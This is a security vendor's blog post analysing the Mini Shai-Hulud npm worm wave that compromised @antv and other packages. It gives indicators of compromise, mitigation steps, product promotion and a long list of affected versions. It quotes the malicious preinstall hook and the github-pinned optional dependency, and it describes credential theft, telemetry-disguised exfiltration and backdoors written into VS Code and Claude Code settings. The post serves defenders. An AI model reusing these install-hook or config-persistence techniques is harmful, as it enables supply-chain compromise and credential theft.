Aikido
Start for Free
No CC required
BlogVulnerabilities & Threats
Mini Shai-Hulud strikes again: npm worm compromises hundreds of @antv packages

Mini Shai-Hulud strikes again: npm worm compromises hundreds of @antv packages

Written by
Sooraj Shah
Published on:
May 19, 2026

Mini Shai-Hulud is back again.

The npm supply chain campaign we have been tracking since April has launched another wave, this time compromising major packages in Alibaba's @antv suite along with echarts-for-react and timeago.js. Our malware team detected a large cluster of compromised package versions across hundreds of npm package names.

Once installed, the payload scrapes plaintext secrets from CI/CD runner memory, steals local cloud and SSH credentials, and plants backdoors in VS Code and Claude Code configurations. Over 2,700 rogue GitHub repos have already been spun up using stolen tokens.

The payload runs at install time. By the time any scanner flags the package, the malicious code has already executed on every machine that installed it. We go into more detail on why this matters in the detection section below.

If you have been following our earlier coverage of the SAP wave and the TanStack wave, this is the same campaign continuing to expand.

What happened

Our malware team picked up a burst of malicious publishes on May 19. By the time we had finished triaging the first batch, more were still coming in.

The bulk of the activity targeted @antv packages, a widely used set of JavaScript data visualization, graphing, mapping, and charting libraries. If you have built dashboards, charts, or data-heavy UIs in a JavaScript project, there is a good chance something in this list is in your dependency tree. The affected set includes @antv/g2, @antv/g6, @antv/x6, @antv/l7, @antv/s2, @antv/f2, @antv/g, @antv/g2plot, @antv/graphin, and @antv/data-set, along with packages outside the namespace like echarts-for-react, timeago.js, size-sensor, and canvas-nest.js.

Beyond @antv, the wave also hit packages under @lint-md, @openclaw-cn, and @starmind, plus several unscoped npm packages.

echarts-for-react alone has roughly 1.1 million weekly downloads. A single compromised version of a package at that scale can reach a lot of environments fast.

This follows the same pattern we have seen in previous waves. The attacker does not need to compromise hundreds of individual accounts. They get access to one maintainer account with broad publishing rights and push malicious versions across everything that account can reach.

How the payload works

The technical approach is consistent with earlier Mini Shai-Hulud variants, with some differences in file naming and infrastructure.

A root-level index.js payload is injected into the package tarball. The package.json is modified to run it during installation:

"preinstall": "bun run index.js"

The index.js file is heavily obfuscated, using string-array lookup tables, runtime decoding, and a custom decryptor to hide sensitive strings from static analysis.

The payload also adds an optional dependency that mirrors the technique we documented in the TanStack wave:

{
  "optionalDependencies": {
    "@antv/setup": "github:antvis/G2#7cb42f57561c321ecb09b4552802ae0ac55b3a7a"
  }
}

This is sometimes called an exotic dependency, a github: prefixed reference that points directly at a GitHub repo and commit instead of an npm-published package. It gives the attacker a second execution path during install without shipping the full payload in the npm tarball. npm runs lifecycle scripts for Git dependencies during installation, so a package that looks like a normal dependency can quietly execute the payload from a completely separate repo.

What the payload steals

The payload targets developer machines and CI/CD environments. It looks for:

  • GitHub tokens
  • npm tokens
  • GitHub Actions OIDC tokens
  • AWS credentials and instance metadata
  • Kubernetes service account files
  • HashiCorp Vault tokens
  • SSH keys and private keys
  • Docker authentication files
  • Database connection strings
  • Environment variables and local filesystem secrets

The stolen data is encrypted before exfiltration, which makes it harder to recover stolen plaintext from network captures. The exfiltration endpoint is disguised as a telemetry URL, which can be easy to miss in build system logs.

The payload also includes a GitHub-based fallback. If it obtains a usable GitHub token, it can create a repository under the victim's account and commit stolen data there. Across the full Mini Shai-Hulud campaign, over 2,700 rogue GitHub repositories have been created using stolen tokens, using the same Dune-themed naming and reversed campaign markers we documented in earlier waves.

Persistence

This is the part that makes cleanup harder than previous waves.

The payload writes to .vscode/tasks.json and .claude/settings.json, planting backdoors in VS Code and Claude Code configurations. That means removing the malicious package from your lockfile is not enough. If these files are not checked and cleaned, the attacker keeps a foothold on the developer's machine even after the dependency is rolled back.

Propagation

The payload still contains the npm propagation logic that makes Mini Shai-Hulud a worm, and it is worth repeating how this works because it explains the speed of these waves.

After stealing npm tokens, it validates them against the npm registry, enumerates packages the token owner can publish, downloads package tarballs, injects the malicious payload, adds a preinstall hook, bumps the version, and republishes. The malware is not just stealing secrets from the current victim. It is using the victim's publishing access to compromise the next set of packages.

This is how the campaign keeps growing. Each compromised account becomes the entry point for the next wave, and maintainers with broad publishing access give the worm a lot of room to spread.

What changed from the TanStack wave

The core model is the same: install-time execution, Bun-based payloads, obfuscated JavaScript, credential harvesting, GitHub abuse, and npm republishing. If you have read our previous write-ups, the architecture will look familiar.

The @antv samples use a root-level index.js rather than the router_init.js we saw in TanStack packages. The C2 infrastructure has changed. The payload is somewhat smaller. The persistence through IDE and AI tooling configs is new, and worth paying attention to, because it means the attacker is thinking about what happens after the initial compromise gets cleaned up.

This is the third major wave we have tracked. It went from a handful of SAP packages in April, to 169 packages in the TanStack wave, to a much larger set of packages now. Each wave has been faster and broader than the last.

Why fast detection is not enough

There has been a lot of emphasis on how quickly malicious packages can be flagged after they are published. Minutes, in some cases. That sounds reassuring, but it misses the problem.

These packages run code at install time. A preinstall hook executes during npm install, before the package is even fully unpacked. If a developer or CI runner installs a compromised version in the window between publish and detection, the payload has already run and credentials have already left the machine. The damage is done before any scanner can flag the package.

Fast detection helps with incident response. It tells you which versions to avoid going forward. But it does not protect the developers and build systems that installed the package during those first minutes.

The more effective defense is to never install a package version that has not had time to be vetted. Blocking packages by age, refusing to install any version published less than a certain number of hours or days ago, closes the window that detection-based approaches leave open. It is a simple policy, and it is the one that actually prevents the payload from running.

Detection and mitigation

If you were not blocking new packages by age and a compromised version made it into your environment, start with lockfiles and package caches.

Search for affected namespaces and packages:

  • @antv/
  • @lint-md/
  • @openclaw-cn/
  • @starmind/
  • echarts-for-react
  • timeago.js
  • size-sensor
  • canvas-nest.js

Search for payload files and dependency markers:

  • preinstall hook containing bun run index.js
  • @antv/setup
  • github:antvis/G2#7cb42f57561c321ecb09b4552802ae0ac55b3a7a

Check for persistence artifacts on developer machines:

  • .vscode/tasks.json for unexpected task definitions
  • .claude/settings.json for unexpected configuration changes

Block outbound network traffic to:

  • t.m-kosche.com

Search CI logs for:

  • Unexpected Bun execution during npm install
  • Optional dependency failures involving @antv/setup
  • Outbound connections during dependency installation
  • npm publish activity from workflows that should not have published
  • GitHub Actions OIDC token requests during unexpected steps

If a compromised package version ran on a developer machine or CI runner, rotate secrets from that environment. Do not stop at npm tokens.

Rotate or review:

  • npm tokens and package publishing access
  • GitHub PATs and GitHub Actions secrets
  • AWS credentials
  • Kubernetes service account tokens
  • Vault tokens
  • SSH keys
  • Docker credentials
  • Deployment secrets

Also audit recent npm publishes and GitHub Actions runs. As we noted in our TanStack write-up: a valid provenance record does not prove the build was safe.

Indicators of compromise

Network indicators:

  • t[.]m-kosche[.]com

Package markers:

  • @antv/setup
  • github:antvis/G2#7cb42f57561c321ecb09b4552802ae0ac55b3a7a
  • preinstall script running bun run index.js
  • Root-level payload file included outside normal package contents

Persistence artifacts:

  • .vscode/tasks.json
  • .claude/settings.json

Campaign markers:

  • Dune-themed repository names on GitHub (over 2,700 observed)
  • Reversed Shai-Hulud strings in repository descriptions
  • results/ directories in attacker-created repositories

Previously documented indicators from the SAP and TanStack waves still apply. See our TanStack write-up for the full IOC list from earlier waves.

Conclusion

Mini Shai-Hulud keeps reaching further into the npm ecosystem. Each wave has been larger than the last, and the @antv packages bring data visualization tooling into the affected set alongside the routing, enterprise, and AI packages from earlier waves. The addition of IDE and AI tooling persistence means removing the bad dependency is no longer enough to clean up.

If any of the affected packages ran in your environment, treat the machine or runner as exposed until secrets are rotated, persistence artifacts are removed, and recent publish activity has been reviewed.

How Aikido protects against this

If you are an Aikido user, check your central feed and filter on malware issues. This will surface as a 100/100 critical issue. Aikido rescans nightly, but we recommend triggering a manual rescan now.

For actual prevention, not just detection after the fact, Aikido offers two layers that address the install-time problem directly.

Aikido Safe Chain (open source) intercepts npm, pnpm, and yarn commands and checks packages against Aikido Intel before install. It blocks compromised packages before they can run installation hooks. If a package is flagged or too new to be trusted, it does not get installed.

Aikido's Devices Protection gives security teams real-time visibility into the dependencies and extensions running on developer machines across the organization. It enforces policies like blocking packages by age, so a version published minutes ago never makes it onto a developer machine in the first place. When something does get through, it lets you contain the blast radius instantly.

If you are not yet an Aikido user, you can create an account and connect your repos. Our malware coverage is included in the free plan, no credit card required.

Appendix: Affected packages and versions

Current list of packages and versions our team has identified across all Mini Shai-Hulud waves. This list includes packages from the SAP, TanStack, and @antv waves.

  • @antv/a8: 0.1.1, 0.2.1
  • @antv/adjust: 0.3.5, 0.4.5
  • @antv/algorithm: 0.2.26, 0.3.26
  • @antv/async-hook: 2.3.9, 2.4.9
  • @antv/attr: 0.4.5, 0.5.5
  • @antv/ava: 3.5.1, 3.6.1
  • @antv/ava-react: 3.4.2, 3.5.2
  • @antv/awards: 0.1.9, 0.2.9
  • @antv/calendar-heatmap: 1.2.2, 1.3.2
  • @antv/chart-linter: 1.2.6, 1.3.6
  • @antv/chart-node-g6: 0.1.4, 0.2.4
  • @antv/chart-visualization-skills: 0.2.3, 0.3.3
  • @antv/ckb: 2.1.4, 2.2.4
  • @antv/color-schema: 0.3.3, 0.4.3
  • @antv/color-util: 2.1.6, 2.2.6
  • @antv/component: 2.2.11, 2.3.11
  • @antv/coord: 0.5.7, 0.6.7
  • @antv/d3-color: 1.1.0, 1.2.0
  • @antv/d3-interpolate: 1.1.3, 1.2.3
  • @antv/data-samples: 1.1.1, 1.2.1
  • @antv/data-set: 0.12.8, 0.13.8
  • @antv/data-wizard: 2.1.4, 2.2.4
  • @antv/dipper-component: 0.1.4, 0.2.4
  • @antv/dipper-hooks: 0.3.1, 0.4.1
  • @antv/dipper-map: 1.1.10, 1.2.10
  • @antv/dom-util: 2.1.4, 2.2.4
  • @antv/dumi-theme-antv: 0.10.4, 0.9.4
  • @antv/dw-analyzer: 1.2.5, 1.3.5
  • @antv/dw-random: 1.2.7, 1.3.7
  • @antv/dw-transform: 1.2.7, 1.3.7
  • @antv/dw-util: 1.2.4, 1.3.4
  • @antv/event-emitter: 0.2.3, 0.3.3
  • @antv/expr: 1.1.2, 1.2.2
  • @antv/f-charts: 0.1.0, 0.2.0
  • @antv/f-engine: 1.11.0, 1.12.0
  • @antv/f-lottie: 1.11.0, 1.12.0
  • @antv/f-my: 1.11.0, 1.12.0
  • @antv/f-react: 1.11.0, 1.12.0
  • @antv/f-test-utils: 1.1.9, 1.2.9
  • @antv/f-vue: 1.11.0, 1.12.0
  • @antv/f-wx: 1.11.0, 1.12.0
  • @antv/f2: 5.15.0, 5.16.0
  • @antv/f2-algorithm: 5.8.0, 5.9.0
  • @antv/f2-canvas: 1.1.5, 1.2.5
  • @antv/f2-context: 0.1.1, 0.2.1
  • @antv/f2-graphic: 0.1.16, 0.2.16
  • @antv/f2-my: 4.1.52, 4.2.52
  • @antv/f2-react: 5.15.0, 5.16.0
  • @antv/f2-site: 4.1.42, 4.2.42
  • @antv/f2-vue: 4.1.33, 4.2.33
  • @antv/f2-wordcloud: 5.15.0, 5.16.0
  • @antv/f2-wx: 4.1.51, 4.2.51
  • @antv/f6: 0.1.19, 0.2.19
  • @antv/f6-alipay: 0.1.7, 0.2.7
  • @antv/f6-core: 0.1.2, 0.2.2
  • @antv/f6-element: 0.1.1, 0.2.1
  • @antv/f6-hammerjs: 0.1.2, 0.2.2
  • @antv/f6-plugin: 1.1.6, 1.2.6
  • @antv/f6-ui: 1.1.3, 1.2.3
  • @antv/f6-wx: 0.1.7, 0.2.7
  • @antv/g: 6.4.1, 6.5.1
  • @antv/g-base: 0.6.16, 0.7.16
  • @antv/g-camera-api: 2.1.45, 2.2.45
  • @antv/g-canvas: 2.3.0, 2.4.0
  • @antv/g-canvaskit: 1.2.1, 1.3.1
  • @antv/g-compat: 1.1.11, 1.2.11
  • @antv/g-components: 2.1.42, 2.2.42
  • @antv/g-css-layout-api: 1.1.38, 1.2.38
  • @antv/g-css-typed-om-api: 1.1.38, 1.2.38
  • @antv/g-device-api: 1.7.13, 1.8.13
  • @antv/g-dom-mutation-observer-api: 2.1.42, 2.2.42
  • @antv/g-gesture: 3.1.42, 3.2.42
  • @antv/g-image-exporter: 1.1.42, 1.2.42
  • @antv/g-layout-blocklike: 1.8.49, 1.9.49
  • @antv/g-lite: 2.8.0, 2.9.0
  • @antv/g-lottie-player: 1.2.1, 1.3.1
  • @antv/g-math: 3.2.0, 3.3.0
  • @antv/g-mobile: 1.2.5, 1.3.5
  • @antv/g-mobile-canvas: 1.2.1, 1.3.1
  • @antv/g-mobile-canvas-element: 1.1.42, 1.2.42
  • @antv/g-mobile-svg: 1.2.1, 1.3.1
  • @antv/g-mobile-webgl: 1.2.1, 1.3.1
  • @antv/g-pattern: 2.1.42, 2.2.42
  • @antv/g-perf: 1.1.0, 1.2.0
  • @antv/g-plugin-3d: 2.2.1, 2.3.1
  • @antv/g-plugin-a11y: 1.5.1, 1.6.1
  • @antv/g-plugin-annotation: 1.3.0, 1.4.0
  • @antv/g-plugin-box2d: 2.2.1, 2.3.1
  • @antv/g-plugin-canvas-path-generator: 2.2.26, 2.3.26
  • @antv/g-plugin-canvas-picker: 2.4.1, 2.5.1
  • @antv/g-plugin-canvas-renderer: 2.6.1, 2.7.1
  • @antv/g-plugin-canvaskit-renderer: 2.4.1, 2.5.1
  • @antv/g-plugin-control: 2.2.1, 2.3.1
  • @antv/g-plugin-css-select: 2.2.1, 2.3.1
  • @antv/g-plugin-device-renderer: 2.7.1, 2.8.1
  • @antv/g-plugin-dom-interaction: 2.2.31, 2.3.31
  • @antv/g-plugin-dragndrop: 2.2.1, 2.3.1
  • @antv/g-plugin-gesture: 2.2.1, 2.3.1
  • @antv/g-plugin-gpgpu: 1.10.20, 1.11.20
  • @antv/g-plugin-html-renderer: 2.4.1, 2.5.1
  • @antv/g-plugin-image-loader: 2.4.1, 2.5.1
  • @antv/g-plugin-matterjs: 2.2.1, 2.3.1
  • @antv/g-plugin-mobile-interaction: 1.1.42, 1.2.42
  • @antv/g-plugin-physx: 2.2.1, 2.3.1
  • @antv/g-plugin-rough-canvas-renderer: 2.2.1, 2.3.1
  • @antv/g-plugin-rough-svg-renderer: 2.2.1, 2.3.1
  • @antv/g-plugin-svg-picker: 2.1.46, 2.2.46
  • @antv/g-plugin-svg-renderer: 2.5.1, 2.6.1
  • @antv/g-plugin-webgl-device: 1.10.17, 1.11.17
  • @antv/g-plugin-webgl-renderer: 1.1.26, 1.2.26
  • @antv/g-plugin-webgpu-device: 1.10.17, 1.11.17
  • @antv/g-plugin-yoga: 2.4.1, 2.5.1
  • @antv/g-plugin-zdog-canvas-renderer: 2.2.1, 2.3.1
  • @antv/g-plugin-zdog-svg-renderer: 2.2.1, 2.3.1
  • @antv/g-shader-components: 2.1.0, 2.2.0
  • @antv/g-svg: 2.2.1, 2.3.1
  • @antv/g-web-animations-api: 2.2.32, 2.3.32
  • @antv/g-web-components: 2.2.1, 2.3.1
  • @antv/g-webgl: 2.2.1, 2.3.1
  • @antv/g-webgl-compute: 0.1.1, 0.2.1
  • @antv/g-webgpu: 2.2.1, 2.3.1
  • @antv/g-webgpu-compiler: 0.8.2, 0.9.2
  • @antv/g-webgpu-core: 0.8.2, 0.9.2
  • @antv/g-webgpu-engine: 0.8.2, 0.9.2
  • @antv/g-webgpu-raytracer: 0.6.1, 0.7.1
  • @antv/g-webgpu-unitchart: 0.6.1, 0.7.1
  • @antv/g2: 5.5.8, 5.6.8
  • @antv/g2-brush: 0.1.2, 0.2.2
  • @antv/g2-extension-3d: 0.3.0, 0.4.0
  • @antv/g2-extension-ava: 0.3.0, 0.4.0
  • @antv/g2-extension-plot: 0.3.2, 0.4.2
  • @antv/g2-plugin-slider: 2.2.1, 2.3.1
  • @antv/g2-ssr: 0.3.0, 0.4.0
  • @antv/g2plot: 2.5.35, 2.6.35
  • @antv/g2plot-schemas: 1.3.2, 1.4.2
  • @antv/g6: 5.2.1, 5.3.1
  • @antv/g6-alipay: 0.1.1, 0.2.1
  • @antv/g6-cli: 0.1.4, 0.2.4
  • @antv/g6-core: 0.10.24, 0.9.24
  • @antv/g6-editor: 1.3.0, 1.4.0
  • @antv/g6-element: 0.10.25, 0.9.25
  • @antv/g6-extension-3d: 0.2.23, 0.3.23
  • @antv/g6-extension-react: 0.3.7, 0.4.7
  • @antv/g6-mobile: 0.2.2, 0.3.2
  • @antv/g6-pc: 0.10.25, 0.9.25
  • @antv/g6-plugin: 0.10.25, 0.9.25
  • @antv/g6-plugin-map-view: 0.1.4, 0.2.4
  • @antv/g6-plugins: 1.1.9, 1.2.9
  • @antv/g6-react-node: 1.5.8, 1.6.8
  • @antv/g6-ssr: 0.2.1, 0.3.1
  • @antv/g6-wx: 0.1.1, 0.2.1
  • @antv/gatsby-theme: 0.2.0, 0.3.0
  • @antv/geo-coord: 1.1.8, 1.2.8
  • @antv/gi-assets-advance: 2.6.22, 2.7.22
  • @antv/gi-assets-algorithm: 2.4.19, 2.5.19
  • @antv/gi-assets-basic: 2.5.40, 2.6.40
  • @antv/gi-assets-galaxybase: 1.3.15, 1.4.15
  • @antv/gi-assets-graphscope: 2.2.15, 2.3.15
  • @antv/gi-assets-hugegraph: 1.2.15, 1.3.15
  • @antv/gi-assets-janusgraph: 1.2.15, 1.3.15
  • @antv/gi-assets-neo4j: 2.2.15, 2.3.15
  • @antv/gi-assets-scene: 2.3.21, 2.4.21
  • @antv/gi-assets-tugraph: 2.2.15, 2.3.15
  • @antv/gi-assets-tugraph-analytics: 0.3.15, 0.4.15
  • @antv/gi-assets-xlab: 0.2.30, 0.3.30
  • @antv/gi-cli: 1.3.11, 1.4.11
  • @antv/gi-common-components: 1.4.16, 1.5.16
  • @antv/gi-mock-data: 1.1.5, 1.2.5
  • @antv/gi-public-data: 1.1.1, 1.2.1
  • @antv/gi-sdk: 3.1.0, 3.2.0
  • @antv/gi-sdk-app: 1.3.10, 1.4.10
  • @antv/gi-theme-antd: 0.7.11, 0.8.11
  • @antv/github-config-cli: 0.2.0, 0.3.0
  • @antv/gl-matrix: 2.8.1, 2.9.1
  • @antv/gpt-vis: 1.1.0, 1.2.0
  • @antv/gpt-vis-ssr: 0.4.7, 0.5.7
  • @antv/graphin: 3.1.5, 3.2.5
  • @antv/graphin-components: 2.5.1, 2.6.1
  • @antv/graphin-graphscope: 1.1.5, 1.2.5
  • @antv/graphin-icons: 1.1.0, 1.2.0
  • @antv/graphlib: 2.1.4, 2.2.4
  • @antv/hierarchy: 0.8.1, 0.9.1
  • @antv/infographic: 0.3.19, 0.4.19
  • @antv/insight-component: 1.1.0, 1.2.0
  • @antv/interaction: 0.2.5, 0.3.5
  • @antv/istanbul: 0.1.0, 0.2.0
  • @antv/knowledge: 1.2.4, 1.3.4
  • @antv/l7: 2.26.10, 2.27.10
  • @antv/l7-component: 2.26.10, 2.27.10
  • @antv/l7-composite-layers: 0.18.1, 0.19.1
  • @antv/l7-core: 2.26.10, 2.27.10
  • @antv/l7-district: 2.4.12, 2.5.12
  • @antv/l7-draw: 3.2.5, 3.3.5
  • @antv/l7-editor: 1.2.13, 1.3.13
  • @antv/l7-extension-g-layer: 1.1.0, 1.2.0
  • @antv/l7-layers: 2.26.10, 2.27.10
  • @antv/l7-leaflet: 1.1.2, 1.2.2
  • @antv/l7-map: 2.26.10, 2.27.10
  • @antv/l7-mapkit: 0.6.0, 0.7.0
  • @antv/l7-maps: 2.26.10, 2.27.10
  • @antv/l7-mini: 2.21.8, 2.22.8
  • @antv/l7-pass: 1.1.0, 1.2.0
  • @antv/l7-react: 2.5.3, 2.6.3
  • @antv/l7-renderer: 2.26.10, 2.27.10
  • @antv/l7-scene: 2.26.10, 2.27.10
  • @antv/l7-source: 2.26.10, 2.27.10
  • @antv/l7-three: 2.26.10, 2.27.10
  • @antv/l7-utils: 2.26.10, 2.27.10
  • @antv/l7plot: 0.6.11, 0.7.11
  • @antv/l7plot-component: 0.1.11, 0.2.11
  • @antv/larkmap: 1.6.1, 1.7.1
  • @antv/layout-gpu: 1.2.7, 1.3.7
  • @antv/layout-wasm: 1.5.2, 1.6.2
  • @antv/li-aiearth-assets: 0.5.7, 0.6.7
  • @antv/li-analysis-assets: 1.10.1, 1.11.1
  • @antv/li-core-assets: 1.4.7, 1.5.7
  • @antv/li-editor: 1.7.1, 1.8.1
  • @antv/li-p2: 1.10.2, 1.9.2
  • @antv/li-sam-assets: 0.2.4, 0.3.4
  • @antv/li-sdk: 1.6.1, 1.7.1
  • @antv/lite-insight: 2.2.1, 2.3.1
  • @antv/matrix-util: 3.1.4, 3.2.4
  • @antv/mcp-server-antv: 0.2.8, 0.3.8
  • @antv/mcp-server-chart: 0.10.10, 0.11.10
  • @antv/my-f2: 2.2.7, 2.3.7
  • @antv/my-f2-pc: 0.2.1, 0.3.1
  • @antv/narrative-text-editor: 0.3.20, 0.4.20
  • @antv/narrative-text-schema: 0.4.7, 0.5.7
  • @antv/narrative-text-vis: 0.4.16, 0.5.16
  • @antv/path-util: 3.1.1, 3.2.1
  • @antv/react-g: 2.2.1, 2.3.1
  • @antv/s2: 2.8.1, 2.9.1
  • @antv/s2-react: 2.4.1, 2.5.1
  • @antv/s2-react-components: 2.2.2, 2.3.2
  • @antv/s2-ssr: 0.2.1, 0.3.1
  • @antv/s2-vue: 2.3.0, 2.4.0
  • @antv/sam: 0.3.0, 0.4.0
  • @antv/scale: 0.6.2, 0.7.2
  • @antv/semantic-release-pnpm: 1.1.4, 1.2.4
  • @antv/smart-color: 0.3.1, 0.4.1
  • @antv/stat: 0.1.2, 0.2.2
  • @antv/t8: 0.4.0, 0.5.0
  • @antv/thumbnails: 2.1.0, 2.2.0
  • @antv/thumbnails-component: 2.1.0, 2.2.0
  • @antv/torch: 1.1.6, 1.2.6
  • @antv/translator: 1.1.1, 1.2.1
  • @antv/util: 3.4.11, 3.5.11
  • @antv/vendor: 1.1.11, 1.2.11
  • @antv/vis-predict-engine: 0.2.1, 0.3.1
  • @antv/webgpu-graph: 1.1.0, 1.2.0
  • @antv/word-scale-chart: 0.4.4, 0.5.4
  • @antv/wx-f2: 2.2.1, 2.3.1
  • @antv/x6: 3.2.7, 3.3.7
  • @antv/x6-angular-shape: 3.1.1, 3.2.1
  • @antv/x6-common: 2.1.17, 2.2.17
  • @antv/x6-components: 0.11.7, 0.12.7
  • @antv/x6-geometry: 2.1.5, 2.2.5
  • @antv/x6-plugin-clipboard: 2.2.6, 2.3.6
  • @antv/x6-plugin-dnd: 2.2.1, 2.3.1
  • @antv/x6-plugin-export: 2.2.6, 2.3.6
  • @antv/x6-plugin-history: 2.3.4, 2.4.4
  • @antv/x6-plugin-keyboard: 2.3.3, 2.4.3
  • @antv/x6-plugin-minimap: 2.1.7, 2.2.7
  • @antv/x6-plugin-scroller: 2.1.10, 2.2.10
  • @antv/x6-plugin-selection: 2.3.2, 2.4.2
  • @antv/x6-plugin-snapline: 2.2.7, 2.3.7
  • @antv/x6-plugin-stencil: 2.2.5, 2.3.5
  • @antv/x6-plugin-transform: 2.2.8, 2.3.8
  • @antv/x6-react: 0.2.26, 0.3.26
  • @antv/x6-react-components: 2.1.9, 2.2.9
  • @antv/x6-react-shape: 3.1.1, 3.2.1
  • @antv/x6-vector: 1.5.2, 1.6.2
  • @antv/x6-vue-shape: 3.1.2, 3.2.2
  • @antv/x6-vue3-shape: 1.1.0, 1.2.0
  • @antv/xflow: 2.2.13, 2.3.13
  • @antv/xflow-core: 1.1.55, 1.2.55
  • @antv/xflow-diff: 1.1.0, 1.2.0
  • @antv/xflow-extension: 1.1.55, 1.2.55
  • @antv/xflow-hook: 1.1.55, 1.2.55
  • @beproduct/nestjs-auth: 0.1.10, 0.1.11, 0.1.12, 0.1.13, 0.1.14, 0.1.15, 0.1.16, 0.1.17, 0.1.18, 0.1.19, 0.1.2, 0.1.3, 0.1.4, 0.1.5, 0.1.6, 0.1.7, 0.1.8, 0.1.9
  • @cap-js/db-service: 2.10.1
  • @cap-js/postgres: 2.2.2
  • @cap-js/sqlite: 2.2.2
  • @dirigible-ai/sdk: 0.6.2, 0.6.3
  • @draftauth/client: 0.2.1, 0.2.2
  • @draftauth/core: 0.13.1, 0.13.2
  • @draftlab/auth: 0.24.1, 0.24.2
  • @draftlab/auth-router: 0.5.1, 0.5.2
  • @draftlab/db: 0.16.1, 0.16.2
  • @intercom/intercom-php: 5.0.2
  • @lint-md/cli: 2.1.0, 2.2.0
  • @lint-md/core: 2.1.0, 2.2.0
  • @lint-md/parser: 0.1.14, 0.2.14
  • @mesadev/rest: 0.28.3
  • @mesadev/saguaro: 0.4.22
  • @mesadev/sdk: 0.28.3
  • @mistralai/mistralai: 2.2.2, 2.2.3, 2.2.4
  • @mistralai/mistralai-azure: 1.7.1, 1.7.2, 1.7.3
  • @mistralai/mistralai-gcp: 1.7.1, 1.7.2, 1.7.3
  • @ml-toolkit-ts/preprocessing: 1.0.2, 1.0.3
  • @ml-toolkit-ts/xgboost: 1.0.3, 1.0.4
  • @openclaw-cn/cli: 1.4.1
  • @openclaw-cn/feishu: 0.2.11
  • @openclaw-cn/libsignal: 2.1.1
  • @openclaw-cn/toutiao-ops: 1.2.4
  • @opensearch-project/opensearch: 3.5.3, 3.6.2, 3.7.0, 3.8.0
  • @squawk/airport-data: 0.7.4, 0.7.5, 0.7.6, 0.7.7, 0.7.8
  • @squawk/airports: 0.6.2, 0.6.3, 0.6.4, 0.6.5, 0.6.6
  • @squawk/airspace: 0.8.1, 0.8.2, 0.8.3, 0.8.4, 0.8.5
  • @squawk/airspace-data: 0.5.3, 0.5.4, 0.5.5, 0.5.6, 0.5.7
  • @squawk/airway-data: 0.5.4, 0.5.5, 0.5.6, 0.5.7, 0.5.8
  • @squawk/airways: 0.4.2, 0.4.3, 0.4.4, 0.4.5, 0.4.6
  • @squawk/fix-data: 0.6.4, 0.6.5, 0.6.6, 0.6.7, 0.6.8
  • @squawk/fixes: 0.3.2, 0.3.3, 0.3.4, 0.3.5, 0.3.6
  • @squawk/flight-math: 0.5.4, 0.5.5, 0.5.6, 0.5.7, 0.5.8
  • @squawk/flightplan: 0.5.2, 0.5.3, 0.5.4, 0.5.5, 0.5.6
  • @squawk/geo: 0.4.4, 0.4.5, 0.4.6, 0.4.7, 0.4.8
  • @squawk/icao-registry: 0.5.2, 0.5.3, 0.5.4, 0.5.5, 0.5.6
  • @squawk/icao-registry-data: 0.8.4, 0.8.5, 0.8.6, 0.8.7, 0.8.8
  • @squawk/mcp: 0.9.1, 0.9.2, 0.9.3, 0.9.4, 0.9.5
  • @squawk/navaid-data: 0.6.4, 0.6.5, 0.6.6, 0.6.7, 0.6.8
  • @squawk/navaids: 0.4.2, 0.4.3, 0.4.4, 0.4.5, 0.4.6
  • @squawk/notams: 0.3.10, 0.3.6, 0.3.7, 0.3.8, 0.3.9
  • @squawk/procedure-data: 0.7.3, 0.7.4, 0.7.5, 0.7.6, 0.7.7
  • @squawk/procedures: 0.5.2, 0.5.3, 0.5.4, 0.5.5, 0.5.6
  • @squawk/types: 0.8.1, 0.8.2, 0.8.3, 0.8.4, 0.8.5
  • @squawk/units: 0.4.3, 0.4.4, 0.4.5, 0.4.6, 0.4.7
  • @squawk/weather: 0.5.10, 0.5.6, 0.5.7, 0.5.8, 0.5.9
  • @starmind/collector-cli: 0.3.10
  • @supersurkhet/cli: 0.0.2, 0.0.3, 0.0.4, 0.0.5, 0.0.6, 0.0.7
  • @supersurkhet/sdk: 0.0.2, 0.0.3, 0.0.4, 0.0.5, 0.0.6, 0.0.7
  • @tallyui/components: 1.0.1, 1.0.2, 1.0.3
  • @tallyui/connector-medusa: 1.0.1, 1.0.2, 1.0.3
  • @tallyui/connector-shopify: 1.0.1, 1.0.2, 1.0.3
  • @tallyui/connector-vendure: 1.0.1, 1.0.2, 1.0.3
  • @tallyui/connector-woocommerce: 1.0.1, 1.0.2, 1.0.3
  • @tallyui/core: 0.2.1, 0.2.2, 0.2.3
  • @tallyui/database: 1.0.1, 1.0.2, 1.0.3
  • @tallyui/pos: 0.1.1, 0.1.2, 0.1.3
  • @tallyui/storage-sqlite: 0.2.1, 0.2.2, 0.2.3
  • @tallyui/theme: 0.2.1, 0.2.2, 0.2.3
  • @tanstack/arktype-adapter: 1.166.12, 1.166.15
  • @tanstack/eslint-plugin-router: 1.161.12, 1.161.9
  • @tanstack/eslint-plugin-start: 0.0.4, 0.0.7
  • @tanstack/history: 1.161.12, 1.161.9
  • @tanstack/nitro-v2-vite-plugin: 1.154.12, 1.154.15
  • @tanstack/react-router: 1.169.5, 1.169.8
  • @tanstack/react-router-devtools: 1.166.16, 1.166.19
  • @tanstack/react-router-ssr-query: 1.166.15, 1.166.18
  • @tanstack/react-start: 1.167.68, 1.167.71
  • @tanstack/react-start-client: 1.166.51, 1.166.54
  • @tanstack/react-start-rsc: 0.0.47, 0.0.50
  • @tanstack/react-start-server: 1.166.55, 1.166.58
  • @tanstack/router-cli: 1.166.46, 1.166.49
  • @tanstack/router-core: 1.169.5, 1.169.8
  • @tanstack/router-devtools: 1.166.16, 1.166.19
  • @tanstack/router-devtools-core: 1.167.6, 1.167.9
  • @tanstack/router-generator: 1.166.45, 1.166.48
  • @tanstack/router-plugin: 1.167.38, 1.167.41
  • @tanstack/router-ssr-query-core: 1.168.3, 1.168.6
  • @tanstack/router-utils: 1.161.11, 1.161.14
  • @tanstack/router-vite-plugin: 1.166.53, 1.166.56
  • @tanstack/solid-router: 1.169.5, 1.169.8
  • @tanstack/solid-router-devtools: 1.166.16, 1.166.19
  • @tanstack/solid-router-ssr-query: 1.166.15, 1.166.18
  • @tanstack/solid-start: 1.167.65, 1.167.68
  • @tanstack/solid-start-client: 1.166.50, 1.166.53
  • @tanstack/solid-start-server: 1.166.54, 1.166.57
  • @tanstack/start-client-core: 1.168.5, 1.168.8
  • @tanstack/start-fn-stubs: 1.161.12, 1.161.9
  • @tanstack/start-plugin-core: 1.169.23, 1.169.26
  • @tanstack/start-server-core: 1.167.33, 1.167.36
  • @tanstack/start-static-server-functions: 1.166.44, 1.166.47
